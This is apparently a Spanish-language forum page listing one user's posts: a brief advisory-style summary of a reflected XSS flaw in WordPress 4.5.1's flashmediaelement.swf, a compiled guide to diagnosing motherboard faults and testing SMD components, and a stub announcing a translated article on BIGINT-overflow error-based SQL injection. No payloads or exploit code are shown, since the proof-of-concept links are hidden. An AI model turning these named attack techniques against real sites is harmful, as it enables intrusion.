Resumen rapido
 
 * XSS reflejado en Wordpress 4.5.1
 * Reportado a finales de abril
 * Arreglado en Wordpress 4.5.2
 
 
 Introduccion
 
 Wordpress 4.5.1 es vulnerable frente a un xss reflejado que se deriva de un proceso de inseguro de sanatizacion en la URL en el archivo flashmediaelement.swf. El codigo en el archivo intenta quitar You are not allowed to view links. Register or Loginen caso de que se establezcan parametros en GET, pero no lo hace, lo que permite el XSS a traves de You are not allowed to view links. Register or Login.
 
 El ataque fue descubierto por primera vez por SYou are not allowed to view links. Register or Login. La vulnerabilidad en flashmediaelement.swf fue descubierta en abril del 2016, identificado por primera vez como You are not allowed to view links. Register or Login. Entonces despues de una revision en equipo, el potencial XSS fue descubierto y analizado por Heiderich, Kinugawa y Inführ. Por ultimo, se ha descubierto, que este archivo viene empaquetado con la ultima version de Wordpress y el problema se reporto a traves de You are not allowed to view links. Register or Loginpor Heiderich et al.
 
 PoC: You are not allowed to view links. Register or Login
 
 
 
 Post Original y para ver como funciona el ataque por dentro:
 
 You are not allowed to view links. Register or Login

19
Introduccion

Antes que nada decirles que esto no es un curso completo, sin mas que nada un tipo de recoleccion de Tutoriales y Videotutoriales que les servira a mas de uno que apenas este iniciandose en esto. Antes que nada comentarles que intente buscar informacion de este tipo y no habia nada como esto en internet por lo cual me arme de valor para publicarlo :v, tambien quisiera comentarles que es recomendable que antes de iniciar este tutorial tengan un poco de conocimiento de electronica basica.


Inspeccion Visual

Lo primero y mas facil que podemos hacer para saber si una tarjeta madre esta dañada es inspeccionarla con una lupa. Para ver si un componente esta 'quemado' o 'hinchado'. Algunos ejemplos, podrian ser los siguientes:



Si por alguna razon no encontramos nada es hora de seguir el camino de la metodologia C:


Diagrama de la tarjeta madre

Este es un apartado interesante, ya que todos los componentes que se encuentran dentro de la placa del circuito impreso, podriamos dividirla en varios apartados, con los cuales podriamos encontrar el problema dependiendo de la falla en la tarjeta madre.
Algunos apartados pueden ser: el sistema de carga, Encendido, USB, etc. Un ejemplo del indice de un diagrama puede ser el siguiente:



Los diagramas los podemos encontrar usando nuestro queridisimo amigo Google! Usando algunos de estos tips para su busqueda:


   
Citar
Datasheet XXX
    Block Diagram XXX
    Schematic XXX
    Diagram XXX

Donde XXX sera el modelo de la placa base o modelo de la laptop o PC. Quiero comentarles que existen infinidades de paginas que te dan los diagramas gratis pero tambien existen demasiadas que te los venden.

Ahora seria muy tedioso de alguna manera decirles cada componente de la tarjeta madre, por lo cual les dejare algunos videotutoriales y enlaces para leer y aprender.


En el siguiente enlace encontraras como leer un diagrama y lo que significa cada simbolo de los componentes electronicos:
You are not allowed to view links. Register or Login

De todas maneras si no te es suficiente te dejo un video de ejemplo:





Componentes SMD

Gracias a que ahora hay mas tecnologia han podido crear dispositivos mas pequeños para que los tengamos a nuestro alcance. SMD como sus siglas lo indican son dispositivos de montaje superficial. Los cuales son componentes un poco mas pequeños (que los de una placa base de CPU) montados en nuestra placa base superficialmente.

Condensadores

Los condensadores o capacitores nos sirven para almacenar energia.

 



Resistencias

Funciona ofreciendo una oposicion al paso de corriente. El problema que puede surgir es que se encuentre abierta (no deja pasar nada de corriente) o en cortocircuito (deja pasar toda la corriente).
Si con el óhmetro en todas las escalas la aguja no se mueve, estamos frente al primer caso. Si en la misma situación la aguja siempre marca el máximo, se trata del segundo. Si marca un nivel aproximado al del valor original de la resistencia, significa que está en perfectas condiciones. El valor original suele estar indicado con un código de colores, con el valor impreso sobre el componente o con un código numérico (que se puede averiguar en el manual de servicio del motherboard).

 


Diodos


Son pequeños componentes electrónicos que permiten el paso de la corriente en un solo sentido. Por lo tanto, el multímetro debería mover la aguja solo cuando el terminal positivo (rojo) se encuentre en la pata marcada con una línea. Si marca en ambas posiciones, significa que está en cortocircuito. Si, por el contrario, no se registran cambios estará abierto.

 


Transistores

Los transistores poseen tres patas (emisor, base y colector), que suelen estar identificadas con las letras E, B y C en la misma plaqueta donde se encuentran soldadas. Existen dos tipos de transistores: NPN y PNP. El primero se mide según el método que explicaremos a  continuación; para el segundo deberemos hacer lo mismo, pero con la polaridad invertida.
Posicionamos la escala del óhmetro en un valor comprendido entre x1 y x100, luego aplicamos el terminal negro (negativo) sobre la pata base y alternamos el rojo (positivo) entre las otras dos. De esta manera, tendría que haber conducción para ambos casos, y al invertir, obtendríamos un valor casi nulo. Por último, entre emisor y colector no debería de haber continuidad en ninguno de los sentidos.


 

 


Soldar correctamente con el cautin

 


Desoldar SMD

 

Conclusion

En pocas palabras reparar tarjetas madres conlleva un poco de dedicacion y esfuerzo, lo cual vale la pena ya que es el componente principal de una Laptop o Computadora de Casa, y ademas de ser el mas costoso, siguiendole la pantalla.

Esto es mas que nada una recopilacion, pero como no vi nada igual en la red, lo junte de una manera 'un poco ordenada' espero que a mas de uno le sea de ayuda, Saludos! 

20
Pentesting / Desbordamiento BGINT - Inyeccion SQL basada en error
« en: Julio 13, 2015, 01:30:54 am »


Hola el otra vez estaba chateando con un amigo Osanda Malith Jayathissa y le pregunte si podria traducir algunos de sus post y gracias a que me dejo hoy les traducire un post muy bueno que he visto en su blog.

Link para ver online: You are not allowed to view links. Register or Login
Link para descargar: You are not allowed to view links. Register or Login

Saludos.

Páginas: [1] 2 3 ... 8